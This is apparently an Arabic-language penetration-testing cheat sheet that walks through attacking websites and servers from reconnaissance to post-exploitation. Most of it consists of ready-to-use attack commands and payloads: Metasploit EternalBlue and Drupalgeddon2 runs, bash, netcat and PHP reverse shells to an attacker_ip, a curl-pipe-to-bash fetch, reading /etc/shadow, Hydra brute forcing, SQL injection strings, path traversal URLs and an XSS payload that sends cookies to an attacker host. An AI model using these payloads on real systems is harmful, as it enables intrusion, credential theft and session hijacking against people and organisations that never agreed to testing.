🧙‍♂️ دليل السحرة لاختبار اختراق المواقع والسيرفرات ✨

🧠 جمع المعلومات (Information Gathering)

أوامر وأمثلة مع الشرح:

• whois domain.com — جلب تفاصيل النطاق (صاحب النطاق، الشركة، تواريخ التسجيل)
• nslookup domain.com — استعلام DNS لمعرفة IP أو سجلات MX
• dig domain.com ANY — إظهار جميع السجلات المتاحة
• theHarvester -d domain.com -b google — جمع الإيميلات من جوجل
• sublist3r -d domain.com — استخراج النطاقات الفرعية المحتملة
• crt.sh/?q=domain.com — البحث عن شهادات SSL المرتبطة بالنطاق

🔍 تحليل البورتات والخدمات (Port Scanning)

أوامر Nmap الأكثر استخدامًا:

• nmap -sS -p- target — فحص كل المنافذ باستخدام TCP SYN
• nmap -sV -sC target — اكتشاف الإصدارات وتشغيل السكربتات الأساسية
• nmap -A target — فحص شامل (نظام التشغيل، سكربتات، Traceroute)
• nmap -Pn target — تجاوز فحص Ping (لأهداف لا تستجيب للـ Ping)
• rustscan -a target — فحص سريع للمنافذ، يُفضل دمجه مع nmap لاحقًا

مثال عملي:

nmap -sS -sV -O -p 21,22,80 target

🔐 الدخول عبر SSH/FTP

الدخول بخدمات FTP وSSH:

ftp target_ip
Name: anonymous
Password: anonymous

أو SSH إذا عُرفت بيانات الدخول:

ssh username@target_ip

إذا لديك مفتاح خاص:

ssh -i id_rsa username@target_ip

💣 استغلال الثغرات (Exploitation)

أدوات شائعة:

• searchsploit wordpress — البحث في قاعدة بيانات exploit-db محليًا
• msfconsole — تشغيل إطار عمل Metasploit

مثال باستخدام EternalBlue:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
run

🌀 تنفيذ Reverse Shell

أنواع Reverse Shell مع الأمثلة:

باستخدام Bash:

bash -i >& /dev/tcp/attacker_ip/4444 0>&1

باستخدام Netcat:

nc -e /bin/bash attacker_ip 4444

باستخدام PHP:

php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

لا تنسَ تشغيل listener قبل التنفيذ:

nc -lvnp 4444

🔎 بعد الدخول (Post Exploitation)

خطوات ضرورية بعد الوصول:

• قراءة /etc/passwd — المستخدمين
• قراءة /etc/shadow — كلمات مرور مشفرة (إذا root)
• البحث عن إعدادات المواقع wp-config.php أو ملفات قواعد بيانات
• فحص العمليات النشطة: ps aux
• البحث عن ملفات SUID: find / -perm -4000 -type f 2>/dev/null
• استخدام أداة linpeas لفحص شامل:

curl -Ls https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

⚔️ تصعيد الصلاحيات (Privilege Escalation)

طرق التصعيد الشائعة:

• sudo -l — الأوامر المسموحة بدون كلمة مرور
• find / -perm -4000 -type f — ملفات SUID التي يمكن استغلالها
• getcap -r / 2>/dev/null — صلاحيات capabilities الممنوحة للملفات
• فحص cron jobs القابلة للكتابة

استخدم موقع GTFOBins لاستغلال أوامر عادية لتصعيد الصلاحيات.

🔑 تخمين كلمات المرور (Brute Forcing)

أدوات وأمثلة:

Hydra:

hydra -l admin -P rockyou.txt ssh://target_ip

Medusa:

medusa -h target_ip -u admin -P passwords.txt -M ssh

Ncrack:

ncrack -p 22 -U users.txt -P passwords.txt target_ip

📜 البحث عن CVE

طرق البحث عن الثغرات:

• قاعدة بيانات CVE الرسمية
• Exploit-DB
• searchsploit apache 2.4.49 — البحث محليًا في قاعدة بيانات الثغرات
• nuclei -u target — البحث التلقائي باستخدام قوالب جاهزة

🧨 موسوعة SQL Injection

أنواع وأساليب SQLi:

• Classic: مثل ' OR 1=1 --
• Blind: يعتمد على التأخير أو الفروق المنطقية
• Error-Based: استغلال رسائل الخطأ
• Union-Based: دمج استعلامات إضافية
• Out-of-Band: تسريب بيانات عبر قنوات خارجية مثل DNS

أمثلة:

' OR 1=1 --
admin' --
1 UNION SELECT null,null,null
1 AND ASCII(SUBSTRING((SELECT database()),1,1))=115
' OR SLEEP(5) --

أداة sqlmap:

sqlmap -u "http://target.com/page.php?id=1" --dbs

sqlmap -u "http://target.com/page.php?id=1" --tables -D database_name

🧠 Metasploit - أمثلة عملية

مثال عملي على استغلال ثغرة:

msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS target_ip
run

مثال على استغلال EternalBlue:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
run

🚪 أمثلة على تجاوز البورتات (Service Abuse)

التعامل مع بروتوكولات معروفة:

ftp target_ip
smbclient -L \\target_ip\ -N
hydra -l root -P rockyou.txt ssh://target_ip

🧰 أدوات ضرورية

• Nmap — فحص الشبكات والمنافذ
• Gobuster — اكتشاف الأدلة والملفات
• sqlmap — استغلال ثغرات قواعد البيانات
• Burp Suite — اعتراض وتحليل الترافيك
• Metasploit — استغلال الثغرات المتقدمة
• Hydra — تخمين كلمات المرور
• linpeas — فحص النظام لتصعيد الصلاحيات
• Nuclei — أداة فحص ثغرات تلقائية
• searchsploit — البحث عن استغلالات محلية

http://target.com/index.php?page=../../../../etc/passwd
http://target.com/index.php?page=../../../../proc/self/environ

http://target.com/index.php?page=../../../../etc/passwd

GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1

GET / HTTP/1.1
User-Agent: <script>document.location='http://attacker_ip/cookie?c='+document.cookie;</script>